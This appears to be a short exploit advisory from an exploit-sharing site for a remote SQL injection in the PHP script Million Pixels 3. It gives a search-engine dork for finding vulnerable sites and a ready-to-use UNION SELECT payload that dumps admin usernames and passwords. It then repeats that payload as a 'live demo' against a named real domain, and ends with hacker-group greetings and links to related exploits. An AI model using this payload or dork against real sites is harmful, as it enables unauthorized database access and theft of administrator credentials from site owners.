#################################################################

#

# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#

#========================================================

# =

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

# =

#========================================================

#

# script : http://e-topbiz.com/oprema/pages/millionpixels3.php

#

# DorK : inurl: "tops_top.php? id_cat ="

#################################################################

Exploit:

www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

L!VE DEMO:

http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability】相关文章：

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit

★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit

★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit